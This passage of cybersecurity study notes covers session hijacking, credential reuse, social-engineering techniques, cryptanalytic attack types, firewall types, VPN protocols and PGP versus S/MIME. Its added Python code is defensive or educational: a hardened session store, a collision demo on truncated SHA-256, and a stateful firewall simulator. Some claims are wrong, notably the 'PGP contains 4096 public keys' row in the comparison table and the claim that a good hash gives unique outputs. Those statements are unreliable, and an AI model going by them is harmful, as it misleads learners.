An attacker can also opt to hijack the session to insert themselves between the requesting
computer and the remote server, pretending to be the other party in the session. This
allows them to intercept information in both directions and is commonly called a man-in-
the-middle attack.
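The session ID handling described above, done the way a practitioner would want it, as an added example that is not part of the original notes: identifiers drawn from the OS random source, stored only as a digest, rotated at login so an ID captured or planted earlier stops working, expired on inactivity, and sent in a cookie the browser will not hand to scripts or to plain-HTTP connections. The in-memory store, the cookie name `sid` and the 15-minute idle timeout are assumptions.

```python
"""Session identifiers that resist hijacking.

Added example, not from the original notes. The store is an in-memory
stand-in for whatever a real application uses; the cookie name 'sid' and
the 15-minute idle timeout are assumptions.
"""
import hashlib
import secrets

IDLE_TIMEOUT_SECONDS = 15 * 60


def _lookup_key(sid):
    # Keep only a digest server-side: a leaked session table then contains
    # nothing an attacker can paste into a Cookie header.
    return hashlib.sha256(sid.encode("ascii")).hexdigest()


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def create(self, user, now):
        # 32 bytes from the OS CSPRNG: not sequential and not derived from the
        # user or the clock, so capturing one id reveals nothing about others.
        sid = secrets.token_urlsafe(32)
        self._sessions[_lookup_key(sid)] = {"user": user, "last_seen": now}
        return sid

    def _record(self, sid, now):
        key = _lookup_key(sid)
        record = self._sessions.get(key)
        if record is None:
            return None
        if now - record["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[key]   # a stale id is useless to whoever captured it
            return None
        record["last_seen"] = now
        return record

    def lookup(self, sid, now):
        """User bound to a valid, non-expired session id, else None."""
        record = self._record(sid, now)
        return None if record is None else record["user"]

    def rotate(self, sid, now, user=None):
        """Swap the id for a fresh one and kill the old. Do this at login and
        on privilege changes: an id fixed or sniffed beforehand stops working
        the moment the user authenticates."""
        record = self._record(sid, now)
        if record is None:
            return None
        self.revoke(sid)
        return self.create(record["user"] if user is None else user, now)

    def revoke(self, sid):
        self._sessions.pop(_lookup_key(sid), None)


def set_cookie_header(sid):
    """HttpOnly keeps the id out of document.cookie (what XSS would read);
    Secure keeps it off plaintext HTTP where a man-in-the-middle could
    capture it; SameSite=Lax stops it riding along on cross-site POSTs."""
    return f"Set-Cookie: sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    store = SessionStore()
    anonymous = store.create("guest", now=0)
    logged_in = store.rotate(anonymous, now=5, user="alice")   # login: old id dies
    print(set_cookie_header(logged_in))
    print(store.lookup(anonymous, now=6), store.lookup(logged_in, now=6))
```

None of this stops an attacker who is already inside the TLS-terminated path, which is why the Secure flag and TLS everywhere matter: the hijack techniques the text lists (XSS, sniffing, man-in-the-middle) all need to get hold of the id, and each attribute above closes one of those routes.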


Credential Reuse

Users today have so many logins and passwords to remember that it’s tempting to reuse
credentials here or there to make life a little easier. Even though security best practices
universally recommend that you have unique passwords for all your applications and
websites, many people still reuse their passwords—a fact attackers rely on.

Once attackers have a collection of usernames and passwords from a breached website or
service (easily acquired on any number of black market websites on the internet), they
know that if they use these same credentials on other websites there’s a chance they’ll be
able to log in.

No matter how tempting it may be to reuse credentials for your email, bank account, and
your favorite sports forum, it’s possible that one day the forum will get hacked, giving
an attacker easy access to your email and bank account. When it comes to credentials,
variety is essential. Password managers are available and can be helpful when it comes
to managing the various credentials you use.

This is just a selection of common attack types and techniques. It is not intended to be
exhaustive, and attackers do evolve and develop new methods as needed; however, being
aware of and mitigating these types of attacks will significantly improve your security
posture.

Social engineering attack techniques

Social engineering attacks come in many different forms and can be performed anywhere
human interaction is involved. The following are the five most common forms of
digital social engineering assaults.

Baiting
As its name implies, baiting attacks use a false promise to pique a victim’s greed or curiosity.
They lure users into a trap that steals their personal information or infects their systems with
malware.

The most reviled form of baiting uses physical media to disperse malware. For example,
attackers leave the bait—typically malware-infected flash drives—in conspicuous areas
where potential victims are certain to see them (e.g., bathrooms, elevators, the parking lot of a
targeted company). The bait has an authentic look to it, such as a label presenting it as the
company’s payroll list.

Victims pick up the bait out of curiosity and insert it into a work or home computer, resulting
in automatic malware installation on the system.

Baiting scams don’t necessarily have to be carried out in the physical world. Online forms of
baiting consist of enticing ads that lead to malicious sites or that encourage users to download
a malware-infected application.

Scareware
Scareware involves victims being bombarded with false alarms and fictitious threats. Users
are deceived into thinking their system is infected with malware, prompting them to install
software that has no real benefit (other than for the perpetrator) or is malware itself.
Scareware is also referred to as deception software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banners appearing in your
browser while surfing the web, displaying text such as, "Your computer may be infected
with harmful spyware programs." It either offers to install the tool (often malware-infected)
for you, or will direct you to a malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings, or makes offers
for users to buy worthless/harmful services.

Pretexting
Here an attacker obtains information through a series of cleverly crafted lies. The scam is
often initiated by a perpetrator pretending to need sensitive information from a victim so as to
perform a critical task.

The attacker usually starts by establishing trust with their victim by impersonating co-
workers, police, bank and tax officials, or other persons who have right-to-know authority.
The pretexter asks questions that are ostensibly required to confirm the victim’s identity,
through which they gather important personal data.

All sorts of pertinent information and records are gathered using this scam, such as social
security numbers, personal addresses and phone numbers, phone records, staff vacation dates,
bank records and even security information related to a physical plant.

Phishing
As one of the most popular social engineering attack types, phishing scams are email and text
message campaigns aimed at creating a sense of urgency, curiosity or fear in victims, then
prodding them into revealing sensitive information, clicking on links to malicious websites, or
opening attachments that contain malware.

An example is an email sent to users of an online service that alerts them of a policy violation
requiring immediate action on their part, such as a required password change. It includes a
link to an illegitimate website—nearly identical in appearance to its legitimate version—
prompting the unsuspecting user to enter their current credentials and new password. Upon
form submission the information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing campaigns,
mail servers with access to threat-sharing platforms can detect and block them much more
easily.

Spear phishing
This is a more targeted version of the phishing scam whereby an attacker chooses specific
individuals or enterprises. They then tailor their messages based on characteristics, job
positions, and contacts belonging to their victims to make their attack less conspicuous. Spear
phishing requires much more effort on behalf of the perpetrator and may take weeks or
months to pull off. Such attacks are much harder to detect and have better success rates if done
skillfully.

A spear phishing scenario might involve an attacker who, in impersonating an organization's
IT consultant, sends an email to one or more employees. It's worded and signed exactly as
the consultant normally does, thereby deceiving recipients into thinking it’s an authentic
message. The message prompts recipients to change their password and provides them with a
link that redirects them to a malicious page where the attacker now captures their credentials.

*Chapter 2*
Cryptography and Cryptanalysis

1. Cryptanalysis and Types of Attacks.

Answer- Cryptology has two parts: Cryptography, which focuses on creating secret codes,
and Cryptanalysis, which is the study of cryptographic algorithms and the breaking of those
secret codes. A person practicing Cryptanalysis is called a Cryptanalyst. Cryptanalysis helps
us better understand cryptosystems and also helps us improve them by finding weak points,
so that the algorithm can be reworked to create a more secure secret code. For example, a
Cryptanalyst might try to decipher a ciphertext to derive the plaintext; cryptanalysis can thus
help us deduce the plaintext or the encryption key.

To determine the weak points of a cryptographic system, it is important to attack the
system. These attacks are called cryptanalytic attacks. They rely on the nature of the
algorithm and also on knowledge of the general characteristics of the plaintext, e.g., the
plaintext may be a regular document written in English or code written in Java. Therefore,
the nature of the plaintext should be known before trying to use these attacks.

Types of Cryptanalytic attacks:

• Known-Plaintext Analysis (KPA): In this type of attack, some plaintext-ciphertext
pairs are already known. The attacker maps them in order to find the encryption key. This
attack is easier to use as a lot of information is already available.
• Chosen-Plaintext Analysis (CPA): In this type of attack, the attacker chooses random
plaintexts, obtains the corresponding ciphertexts and tries to find the encryption key.
It is as simple to implement as KPA, but the success rate is quite low.
• Ciphertext-Only Analysis (COA): In this type of attack, only some ciphertext is
known and the attacker tries to find the corresponding encryption key and plaintext. It is
the hardest to implement but is the most probable attack, as only ciphertext is required.
• Man-In-The-Middle (MITM) attack: In this type of attack, the attacker intercepts the
messages or keys exchanged between two communicating parties over what they believe
is a secure channel.
• Adaptive Chosen-Plaintext Analysis (ACPA): This attack is similar to CPA. Here, the
attacker requests the ciphertexts of additional plaintexts after they already have ciphertexts
for some texts.
• Birthday attack: This attack exploits the probability of two or more individuals sharing
the same birthday in a group of people. In cryptography, this attack is used to find
collisions in a hash function.
• Side-channel attack: This type of attack is based on information obtained from the
physical implementation of the cryptographic system, rather than on weaknesses in the
algorithm itself. Side-channel attacks include timing attacks, power analysis attacks,
electromagnetic attacks, and others.
• Brute-force attack: This attack involves trying every possible key until the correct one
is found. While this attack is simple to implement, it can be time-consuming and
computationally expensive, especially for longer keys.
• Differential cryptanalysis: This type of attack involves comparing pairs of plaintexts
and their corresponding ciphertexts to find patterns in the encryption algorithm. It can
be effective against block ciphers with certain properties.

2. Explain Firewall policy and Intrusion Prevention policy in Cyber Security.

Answer- Firewall policies let you group several firewall rules so that you can update them all
at once, with access to them controlled by Identity and Access Management (IAM) roles. These
policies contain rules that can explicitly deny or allow connections, as do Virtual Private
Cloud (VPC) firewall rules.

Intrusion prevention system- An intrusion prevention system (IPS) is a network
security tool (which can be a hardware device or software) that continuously monitors a
network for malicious activity and takes action to prevent it, including reporting, blocking, or
dropping it, when it does occur.
It is more advanced than an intrusion detection system (IDS), which simply detects malicious
activity but cannot take action against it beyond alerting an administrator. Intrusion
prevention systems are sometimes included as part of a next-generation firewall (NGFW) or
unified threat management (UTM) solution. Like many network security technologies, they
must be powerful enough to scan a high volume of traffic without slowing down network
performance.

3. Difference between Cryptography and Cryptanalysis.

Answer- Comparison between Cryptography and Cryptanalysis:

Definition
    Cryptography: The art or science of encrypting plain messages into cipher text for
    security of the messages, especially while in transmission.
    Cryptanalysis: The art of obtaining plain text from a cipher text without knowledge
    of the key.

Origin
    Cryptography: From Greek κρυπτός, "hidden, secret"; and γράφειν, graphein,
    "writing", or -λογία, -logia, "study", respectively.
    Cryptanalysis: From Greek kryptós, "hidden", and analýein, "to loosen" or "to untie".

Practitioner
    Cryptography: Cryptographer
    Cryptanalysis: Cryptanalyst

Focus
    Cryptography: Secret writing
    Cryptanalysis: Breaking secrets

Concern (for cipher or hash)
    Cryptography: A hash or cipher needs to be more conservative and therefore slower;
    less original.
    Cryptanalysis: Obtaining an original or completely new hash; an efficient hash or
    cipher.

Characteristics
    Cryptography: It uses operations like substitution, transposition and product
    systems. The system may use the same key or different keys for sender and receiver.
    Processing techniques include block ciphers and stream ciphers.
    Cryptanalysis: Depends on the nature of the algorithm and mostly on some knowledge
    of the characteristics of the plaintext. It attempts to find out the ciphertext or
    the key.

4. What is Cryptography? Features of cryptography.

Answer- Cryptography is the study of securing communications from outside
observers. Encryption algorithms take the original message, or plaintext, and convert it
into ciphertext, which is not understandable. The key allows the user to decrypt the message,
thus ensuring that only they can read it. The strength of the randomness of
an encryption is also studied, which makes it harder for anyone to guess the key or the input
of the algorithm. Cryptography is how we can achieve more secure and robust connections to
elevate our privacy. Advancements in cryptography make it harder to break encryption, so
that encrypted files, folders, or network connections are only accessible to authorized users.

Cryptography focuses on four different objectives:

1. Confidentiality: Confidentiality ensures that only the intended recipient can decrypt
the message and read its contents.
2. Non-repudiation: Non-repudiation means the sender of the message cannot
backtrack in the future and deny their reasons for sending or creating the message.
3. Integrity: Integrity focuses on the ability to be certain that the information contained
within the message cannot be modified while in storage or transit.
4. Authenticity: Authenticity ensures the sender and recipient can verify each other’s
identities and the destination of the message.

Types of Cryptography
Cryptography can be broken down into three different types:

• Secret Key Cryptography
• Public Key Cryptography
• Hash Functions

Secret Key Cryptography, or symmetric cryptography, uses a single key to encrypt data. Both
encryption and decryption in symmetric cryptography use the same key, making this the
easiest form of cryptography. The cryptographic algorithm utilizes the key in a cipher to
encrypt the data, and when the data must be accessed again, a person entrusted with the secret
key can decrypt the data. Secret Key Cryptography can be used on both in-transit and at-
rest data, but is commonly only used on at-rest data, as sending the secret to the recipient of
the message can lead to compromise.

Examples:

• AES
• DES
• Caesar Cipher

Public Key Cryptography, or asymmetric cryptography, uses two keys to encrypt data. One is
used for encryption, while the other key decrypts the message. Unlike symmetric
cryptography, if one key is used to encrypt, that same key cannot decrypt the message; the
other key must be used.
One key is kept private, and is called the "private key", while the other is shared publicly and
can be used by anyone, hence it is known as the "public key". The mathematical relation of
the keys is such that the private key cannot be derived from the public key, but the public key
can be derived from the private key. The private key should not be distributed and should
remain with the owner only. The public key can be given to any other entity.

Examples:

• ECC
• Diffie-Hellman
• DSS

Hash functions are irreversible, one-way functions which protect the data, at the cost of not
being able to recover the original message. Hashing is a way to transform a given string into a
fixed length string. A good hashing algorithm will produce unique outputs for each input
given. The only way to crack a hash is by trying every input possible, until you get the exact
same hash. A hash can be used for hashing data (such as passwords) and in certificates.

Some of the most famous hashing algorithms are:

• MD5
• SHA-1
• SHA-2 family, which includes SHA-224, SHA-256, SHA-384, and SHA-512
• SHA-3
• Whirlpool
• BLAKE2
• BLAKE3
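As an added example (not from the original notes) serving both the birthday attack listed among the cryptanalytic attacks above and the point that a good hash must not produce the same output for two inputs: SHA-256 truncated to 24 bits stands in for a hash with a short output, and the code finds two inputs with the same truncated digest in roughly sqrt(pi/2 * 2^24), about 5,000, trials rather than the millions an exhaustive search would need. The truncation width, random seed and inputs are constructed for the demonstration.

```python
import hashlib
import math
import random


def truncated_sha256(data: bytes, bits: int) -> int:
    """SHA-256 keeping only its first `bits` bits (bits=256 returns the full digest).
    A stand-in for a hash function with a short output; real SHA-256 keeps all 256."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def expected_birthday_trials(bits: int) -> float:
    """Expected number of random inputs before two share a `bits`-bit hash,
    about sqrt(pi/2 * 2**bits). A brute-force search for a *specific* digest
    (a preimage) needs about 2**bits / 2 trials instead."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_collision(bits: int, seed: int = 2024, max_trials: int = 2_000_000):
    """Birthday attack: hash random inputs, remember each digest, and stop as soon
    as one repeats. Returns (input_a, input_b, trials), or None if max_trials
    is exhausted. The seed only makes the demonstration repeatable."""
    rng = random.Random(seed)           # constructed, deterministic input stream
    seen = {}                           # truncated digest -> first input that produced it
    for trials in range(1, max_trials + 1):
        msg = rng.getrandbits(64).to_bytes(8, "big")
        h = truncated_sha256(msg, bits)
        if h in seen and seen[h] != msg:
            return seen[h], msg, trials
        seen[h] = msg
    return None


if __name__ == "__main__":
    bits = 24
    a, b, trials = find_collision(bits)
    print(f"expected ~{expected_birthday_trials(bits):.0f} trials, needed {trials}")
    print(f"{a.hex()} and {b.hex()} share the {bits}-bit digest "
          f"{truncated_sha256(a, bits):06x}")
    # The full 256-bit digests still differ: the attack only beat the truncation.
    print("full SHA-256 equal:", truncated_sha256(a, 256) == truncated_sha256(b, 256))
```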

5. What is a Firewall? Types of Firewalls.

Answer- A firewall is a type of cybersecurity tool used to filter traffic on a network.
Firewalls can separate network nodes from external traffic sources, internal traffic sources, or
even specific applications. Firewalls can be software, hardware, or cloud-based, with each
type of firewall having unique pros and cons.

The primary goal of a firewall is to block malicious traffic requests and data packets while
letting through legitimate traffic.

Depending on their structure, there are mainly three types of firewalls: software firewalls,
hardware firewalls, or a combination of both. Each type of firewall has different functionality
but the same purpose. However, it is best practice to have both to achieve the maximum
possible protection.

A hardware firewall is a physical device that attaches between a computer network and a
gateway. For example- a broadband router. A hardware firewall is sometimes referred to as
an Appliance Firewall. On the other hand, a software firewall is a simple program installed
on a computer that works through port numbers and other installed software. This type of
firewall is also called a Host Firewall.

Besides, there are many other types of firewalls depending on their features and the level of
security they provide. The following are types of firewall techniques that can be implemented
as software or hardware:

o Packet-filtering Firewalls
o Circuit-level Gateways
o Application-level Gateways (Proxy Firewalls)
o Stateful Multi-layer Inspection (SMLI) Firewalls
o Next-generation Firewalls (NGFW)
o Threat-focused NGFW
o Network Address Translation (NAT) Firewalls
o Cloud Firewalls
o Unified Threat Management (UTM) Firewalls

Packet-filtering Firewalls

A packet-filtering firewall is the most basic type of firewall. It acts like a management
program that monitors network traffic and filters incoming packets based on configured
security rules. These firewalls are designed to block network traffic based on IP protocol, IP
address, and port number when a data packet does not match the established rule set.

While packet-filtering firewalls can be considered a fast solution without many resource
requirements, they also have some limitations. Because these types of firewalls do not
prevent web-based attacks, they are not the safest.

Circuit-level Gateways

Circuit-level gateways are another simplified type of firewall that can be easily configured to
allow or block traffic without consuming significant computing resources. These types of
firewalls typically operate at the session-level of the OSI model by verifying TCP
(Transmission Control Protocol) connections and sessions. Circuit-level gateways are
designed to ensure that the established sessions are protected.

Typically, circuit-level firewalls are implemented as security software or within pre-existing
firewalls. Like packet-filtering firewalls, these firewalls do not check the actual data,
although they inspect information about transactions. Therefore, if a packet contains malware
but follows the correct TCP connection, it will pass through the gateway. That is why circuit-
level gateways are not considered safe enough to protect our systems.

Application-level Gateways (Proxy Firewalls)

Proxy firewalls operate at the application layer as an intermediate device to filter incoming
traffic between two end systems (e.g., network and traffic systems). That is why these
firewalls are called 'Application-level Gateways'.

Unlike basic firewalls, these firewalls forward requests on behalf of clients, so that to the
web server the proxy appears to be the original client. This protects the client's identity and
other sensitive information, keeping the network safe from potential attacks. Once the
connection is established, the proxy firewall inspects data packets coming from the source. If
the contents of the incoming data packet pass inspection, the proxy firewall forwards it to the
client. This approach creates an additional layer of security between the client and many
different sources on the network.

Stateful Multi-layer Inspection (SMLI) Firewalls

Stateful multi-layer inspection firewalls include both packet inspection technology
and TCP handshake verification, making SMLI firewalls superior to packet-filtering firewalls
or circuit-level gateways. Additionally, these types of firewalls keep track of the status of
established connections.

In simple words, when a user establishes a connection and requests data, the SMLI firewall
creates a database (state table). The database is used to store session information such as
source IP address, port number, destination IP address, destination port number, etc.
Connection information is stored for each session in the state table. Using stateful inspection
technology, these firewalls create security rules to allow anticipated traffic.

In most cases, SMLI firewalls are implemented as additional security levels. These types of
firewalls implement more checks and are considered more secure than stateless firewalls.
This is why stateful packet inspection is implemented along with many other firewalls to
track statistics for all internal traffic. Doing so increases the load and puts more pressure on
computing resources. This can give rise to a slower transfer rate for data packets than other
solutions.
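As an added illustration, not code from the original notes: a minimal stateful inspection filter in Python that keeps the state table described above (source IP, source port, destination IP, destination port) and follows the TCP handshake, so that only packets belonging to a tracked session, or a fresh outbound SYN allowed by policy, are accepted. The addresses, ports and packet trace are constructed, and the policy (protected prefix 10.0.0., outbound ports 80 and 443 allowed) is an assumption for the demonstration.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Packet:
    """A simplified TCP packet: the 5-tuple fields a state table stores, plus flags."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    flags: frozenset          # subset of {"SYN", "ACK", "FIN", "RST"}


@dataclass
class StatefulFirewall:
    """Outbound sessions are admitted by policy; every other packet must match a
    tracked session AND be the next expected handshake step, or it is dropped."""
    internal_prefix: str                      # e.g. "10.0.0." marks the protected side
    allowed_outbound_ports: frozenset
    state: dict = field(default_factory=dict)  # (src, sport, dst, dport) of initiator -> state

    @staticmethod
    def _forward_key(p):
        return (p.src_ip, p.src_port, p.dst_ip, p.dst_port)

    @staticmethod
    def _reverse_key(p):
        return (p.dst_ip, p.dst_port, p.src_ip, p.src_port)

    def process(self, p: Packet) -> str:
        fwd, rev = self._forward_key(p), self._reverse_key(p)

        if fwd in self.state:                        # initiator -> responder direction
            st = self.state[fwd]
            if "RST" in p.flags or "FIN" in p.flags:
                del self.state[fwd]                  # session torn down, entry removed
                return "ACCEPT"
            if st == "SYN_RECEIVED" and "ACK" in p.flags:
                self.state[fwd] = "ESTABLISHED"      # third handshake step
                return "ACCEPT"
            if st in ("ESTABLISHED", "SYN_SENT"):    # data, or a retransmitted SYN
                return "ACCEPT"
            return "DROP"

        if rev in self.state:                        # responder -> initiator direction
            st = self.state[rev]
            if "RST" in p.flags or "FIN" in p.flags:
                del self.state[rev]
                return "ACCEPT"
            if st == "SYN_SENT" and p.flags == frozenset({"SYN", "ACK"}):
                self.state[rev] = "SYN_RECEIVED"     # second handshake step
                return "ACCEPT"
            if st == "ESTABLISHED":
                return "ACCEPT"
            return "DROP"                            # out-of-sequence for this session

        # Unknown session: only a fresh SYN from inside to an allowed port opens one.
        if (p.flags == frozenset({"SYN"})
                and p.src_ip.startswith(self.internal_prefix)
                and not p.dst_ip.startswith(self.internal_prefix)
                and p.dst_port in self.allowed_outbound_ports):
            self.state[fwd] = "SYN_SENT"
            return "ACCEPT"
        return "DROP"


def pkt(src: str, dst: str, *flags: str) -> Packet:
    """Helper: 'ip:port' strings plus flag names -> Packet."""
    sip, sp = src.split(":")
    dip, dp = dst.split(":")
    return Packet(sip, int(sp), dip, int(dp), frozenset(flags))


# Constructed trace using documentation address ranges, not real hosts.
SAMPLE_TRACE = [
    pkt("10.0.0.5:51000", "203.0.113.10:443", "SYN"),         # outbound SYN opens a session
    pkt("203.0.113.10:443", "10.0.0.5:51000", "SYN", "ACK"),  # reply matches the state table
    pkt("10.0.0.5:51000", "203.0.113.10:443", "ACK"),         # handshake completes
    pkt("203.0.113.10:443", "10.0.0.5:51000", "ACK"),         # server data on established session
    pkt("198.51.100.7:4444", "10.0.0.5:22", "SYN"),           # unsolicited inbound SYN
    pkt("198.51.100.7:443", "10.0.0.9:51000", "ACK"),         # stray ACK: a stateless
                                                              #   "allow if ACK set" rule passes it
    pkt("10.0.0.5:51001", "203.0.113.10:23", "SYN"),          # outbound to a port not in policy
    pkt("10.0.0.5:51000", "203.0.113.10:443", "FIN", "ACK"),  # client closes: entry removed
    pkt("203.0.113.10:443", "10.0.0.5:51000", "ACK"),         # late data after teardown
]
EXPECTED = ["ACCEPT", "ACCEPT", "ACCEPT", "ACCEPT", "DROP", "DROP", "DROP", "ACCEPT", "DROP"]


def run_trace(packets) -> list:
    """Run a packet list through a fresh firewall and return the verdicts in order."""
    fw = StatefulFirewall("10.0.0.", frozenset({80, 443}))
    return [fw.process(p) for p in packets]


if __name__ == "__main__":
    for p, verdict in zip(SAMPLE_TRACE, run_trace(SAMPLE_TRACE)):
        print(f"{verdict:6} {p.src_ip}:{p.src_port} -> {p.dst_ip}:{p.dst_port} "
              f"{sorted(p.flags)}")
```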

Next-generation Firewalls (NGFW)

Many of the latest released firewalls are usually defined as 'next-generation firewalls'.
However, there is no specific definition for next-generation firewalls. This type of firewall is
usually defined as a security device combining the features and functionalities of other
firewalls. These firewalls include deep-packet inspection (DPI), surface-level packet
inspection, and TCP handshake testing, etc.

NGFW includes higher levels of security than packet-filtering and stateful inspection
firewalls. Unlike traditional firewalls, NGFW monitors the entire transaction of data,
including packet headers, packet contents, and sources. NGFWs are designed in such a way
that they can prevent more sophisticated and evolving security threats such as malware
attacks, external threats, and advanced intrusions.

Threat-focused NGFW

Threat-focused NGFW includes all the features of a traditional NGFW. Additionally, they
also provide advanced threat detection and remediation. These types of firewalls are capable
of reacting against attacks quickly. With intelligent security automation, threat-focused
NGFW set security rules and policies, further increasing the security of the overall defense
system.

In addition, these firewalls use retrospective security systems to monitor suspicious activities
continuously. They keep analyzing the behavior of every activity even after the initial
inspection. Due to this functionality, threat-focused NGFWs dramatically reduce the overall
time taken from threat detection to cleanup.

Network Address Translation (NAT) Firewalls

Network address translation or NAT firewalls are primarily designed to allow access to Internet
traffic and block all unwanted connections. These types of firewalls usually hide the IP
addresses of our devices, making them safer from attackers.

When multiple devices are used to connect to the Internet, NAT firewalls present a single
public IP address and hide the individual devices' IP addresses. As a result, a single IP address
is used for all devices. By doing this, NAT firewalls shield the independent network addresses
from attackers scanning a network for reachable IP addresses. This results in enhanced
protection against suspicious activities and attacks.

In general, NAT firewalls work similarly to proxy firewalls. Like proxy firewalls, NAT
firewalls also work as an intermediate device between a group of computers and external
traffic.

Cloud Firewalls

Whenever a firewall is designed using a cloud solution, it is known as a cloud firewall
or FaaS (firewall-as-a-service). Cloud firewalls are typically maintained and run on the
Internet by third-party vendors. This type of firewall is considered similar to a proxy firewall.
The reason for this is the use of cloud firewalls as proxy servers. However, they are
configured based on requirements.

The most significant advantage of cloud firewalls is scalability. Because cloud firewalls have
no physical resources, they are easy to scale according to the organization's demand or
traffic-load. If demand increases, additional capacity can be added to the cloud server to filter
out the additional traffic load. Most organizations use cloud firewalls to secure their internal
networks or entire cloud infrastructure.

Unified Threat Management (UTM) Firewalls

UTM firewalls are a special type of device that includes features of a stateful inspection
firewall with anti-virus and intrusion prevention support. Such firewalls are designed to
provide simplicity and ease of use. These firewalls can also add many other services, such as
cloud management, etc.

6. What security protocol is used for VPN security? What is security at the application
layer in cyber security? Difference between PGP and S/MIME.

Answer- Most common VPN protocols

VPNs use tunneling protocols that act as rules for sending the data. A tunneling protocol
provides detailed instructions on how to package the data and what checks to perform when it
reaches its destination. These different methods directly affect the speed and security of the
process. Here are the most popular ones.

Internet Protocol Security (IPSec)

IPSec is a VPN tunneling protocol that secures data exchange by enforcing session
authentication and data packet encryption. It is twofold encryption: the encrypted
message sits in the data packet, which is further encrypted again. The IPSec protocol combines
with other protocols for added security and is frequently used in site-to-site VPN setups due to
its high compatibility.

Layer 2 Tunneling Protocol (L2TP)

L2TP works by generating a secure tunnel between two L2TP connection points. Once
established, it uses an additional tunneling protocol, typically IPSec, to encrypt the data sent.
L2TP's complex architecture helps to ensure high security of the exchanged data. It's another
popular choice for site-to-site setups, especially when higher security is needed.

Point-to-Point Tunneling Protocol (PPTP)

PPTP is another tunneling protocol that creates a tunnel with a PPTP cipher. However,
since the creation of the cipher in the '90s, computing power has increased exponentially.
Brute-forcing the cipher wouldn't take long, revealing the exchanged data. For this reason,
this cipher is rarely used today; a replacement with more secure tunneling protocols and more
advanced encryption is preferable.

SSL and TLS

Secure Sockets Layer and Transport Layer Security protocols are the same standard that
encrypts HTTPS web pages. That way, the web browser acts as the client, and user access is
limited to specific applications rather than the entire network. Since almost all browsers come
equipped with SSL and TLS support, no additional software is usually required. Usually,
remote access VPNs use SSL/TLS.

OpenVPN

OpenVPN is an open-source enhancement of the SSL/TLS framework with additional
cryptographic algorithms to make your encrypted tunnel even safer. It's the go-to tunneling
protocol for its high security and efficiency. However, compatibility and setup can be hit
or miss, as you won't be able to install it natively on many devices to form router-to-router
VPN networks. So, the performance may vary.

It comes in User Datagram Protocol (UDP) or Transmission Control Protocol (TCP)
versions. UDP is faster because it uses fewer data checks, while TCP is slower but better
protects data integrity. As a whole, OpenVPN is a well-rounded and secure tunneling
protocol and is popular for both remote access and site-to-site virtual private network uses.

Secure Shell (SSH)

Like the other options, SSH generates an encrypted connection and allows port
forwarding to remote machines via a secured channel. It is useful for accessing your office
desktop via your laptop at home. While it does add flexibility, SSH channels should always
be under close supervision, since they can provide a direct entry point for a breach. That's
why it's a better fit only in remote access setups.

WireGuard

The most recent widely available tunneling protocol is less complex but much more efficient
and safer than IPSec and OpenVPN. It relies on highly streamlined code to squeeze out the
best possible performance with a minimal margin of error. While it is still in the early
adoption stage, you can find offices using site-to-site connections based on WireGuard.
There are even proprietary WireGuard implementations like NordLynx.

Application layer in network security

The OSI and TCP/IP models

The Open Systems Interconnection (OSI) model and the TCP/IP Model explain the functions
performed for two computers to communicate over a network. These functions are divided
into layers, as shown below:

The topmost layer in both cases is the application layer. A user interacts with the application
layer. The application layer is used to display information to the user as well as receive
information from the user. It allows application-to-application communication by using
services of the layers that are below it.

For example, in a client-server architecture, the client sends a request to the web server
running on a different host. The server will then send over the required information as a
response.

Another example is a peer-to-peer architecture in which different hosts communicate with
each other, and there is no assigned client or server. In this case, all the hosts will participate
in sharing files, and, at one point, one host may be the client when it needs to download a file.
At another point, the same host may be the server when it uploads a file.

Application layer protocols

As we have seen, applications can communicate with each other using requests and responses
by sending messages to each other. These messages must be structured properly so that the
end systems can understand them correctly. Application layer protocols describe the structure
as well as the procedure in which these messages are sent. These protocols are responsible
for:

• defining the syntax as well as the meaning of messages sent
• defining which type of message is received, e.g., request or response
• describing the process followed when sending or receiving a message

Examples

1. HTTP

HyperText Transfer Protocol is the web's application layer protocol. It is a client-server
protocol in which browsers are the clients, and they request resources from web servers
residing on different hosts.
The format of an HTTP request is as follows:

There are many different methods defined in HTTP (such as GET, POST, DELETE, PUT,
and PATCH), but the one that is most commonly used is GET, which retrieves a resource
from the host. There are also a variety of other headers that can be included in a request.
These messages can also include any data that needs to be sent to the server.

The status code and message allow the client to understand whether or not their request was
successful. Status 200 indicates a successful request, whereas 404 means that the resource
was not found. There are other status codes as well that are understood by HTTP
applications.

2. FTP

File Transfer Protocol (FTP) is used to share files between local and remote hosts. The first
requirement is for the user to authenticate themselves, after which a control connection is
established with the remote server. There are separate control and data connections between
the server and client. Files can only be safely transmitted once a control connection is
successfully established.

3. DNS

Identification of servers can be done in two ways:

1. using hostnames
2. using IP addresses

It is easier for humans to identify hosts using their hostnames instead of IP addresses.
However, routers prefer to identify hosts using IP addresses since they are of fixed length and
only contain digits that are easy to process. Domain Name System (DNS) is a protocol that
provides the translation between hostnames and IP addresses.

Application layer security

As mentioned in the previous sections, the application layer is the closest to the user.
Therefore, an attack on it is very dangerous. In such a situation, performance may be
degraded, data integrity may be compromised, user data may be stolen, or the network may
break down.
Some application layer attacks include:

• SQL injections
• denial of service attacks
• cross-site scripting
• access to unauthorized data
• parameter tampering

Mitigation of attacks

There should be security present at the application layer to ensure that attacks can be
successfully defended against.

Some methods to avoid these attacks are:

• develop DDoS prevention and response plans
• invest in web application firewalls
• secure the network infrastructure

Difference between PGP and S/MIME

S.NO | PGP | S/MIME
1. | It is designed for processing plain text. | It is designed to process email as well as many multimedia files.
2. | PGP is less costly as compared to S/MIME. | S/MIME is comparatively expensive.
3. | PGP is good for personal as well as office use. | It is good for industrial use.
4. | PGP is less efficient than S/MIME. | It is more efficient than PGP.
5. | It depends on user key exchange. | It relies on a hierarchically valid certificate for key exchange.
6. | PGP is comparatively less convenient. | It is more convenient than PGP due to the secure transformation of all the applications.
7. | PGP contains 4096 public keys. | It contains only 1024 public keys.
8. | PGP is the standard for strong encryption. | It is also the standard for strong encryption but has some drawbacks.
9. | PGP can also be used in VPNs. | It is not used in VPNs; it is only used in email services.
